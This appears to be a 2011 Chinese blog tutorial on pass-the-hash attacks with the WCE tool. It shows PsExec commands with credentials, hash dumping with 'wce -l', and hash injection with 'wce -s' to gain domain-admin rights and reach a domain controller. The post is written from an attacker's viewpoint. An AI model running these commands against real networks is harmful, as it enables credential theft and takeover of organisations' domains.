wcehash注入

哈希注入工具wce  

2011-10-06 18:58:18|  分類: 默認分類|字號 訂閱

哈希注入工具wce - 小7〃 - 〃China小7

(1)攻擊者第一步首先需要從受害者機器獲取hash pwdump gsecdump等

哈希注入工具wce - 小7〃 - 〃China小7

普通機器:(192.168.0.102)通常是我們獲得的某臺肉雞,通常爲普通的webserver,不處於域中

獲取方式: social engineering, password stealer, password cracker, malicious code,exploiting zero-day

域成員:(192.168.0.109)大的公司,獲取webserver後,通常需要面對一個域內網, 通常上邊有域管理員進行登錄,或者是域管理員委派的用戶。

DC:(192.168.0.7域控制器。

我們通過提權會得到“普通機器”的管理員權限,這時候我們通過HASH提取工具提取出HASH並可以到論壇提供的在線破解網址很容易破解,假如我得到了Administrator的密碼20x78,這時候通常會以這個administrator密碼social engineering域成員的那臺機器。

我通過psexec在192.168.0.102操作,上傳工具wce到192.168.0.109

哈希注入工具wce - 小7〃 - 〃China小7

在192.168.0.102上執行

PsExec.exe \\192.168.0.109 -u administrator -p 200798 -e c:\windows\system32\cmd.exe

經測試,不能執行net time /domain,說明爲普通的域成員服務器

哈希注入工具wce - 小7〃 - 〃China小7

接下來,我們提取全部的HASH,並觀察域管理的hash,進行注入,首先執行:

C:\>wce -l

提取全部HASH,紅線部分爲域管理員的HASH。


哈希注入工具wce - 小7〃 - 〃China小7


Wce -s Administrator:BLACKEAGLE:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F 
複製代碼

提示注入成功,我們現在是域管理員權限了,這樣就可以登錄DC了。


哈希注入工具wce - 小7〃 - 〃China小7

哈希注入工具wce - 小7〃 - 〃China小7

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章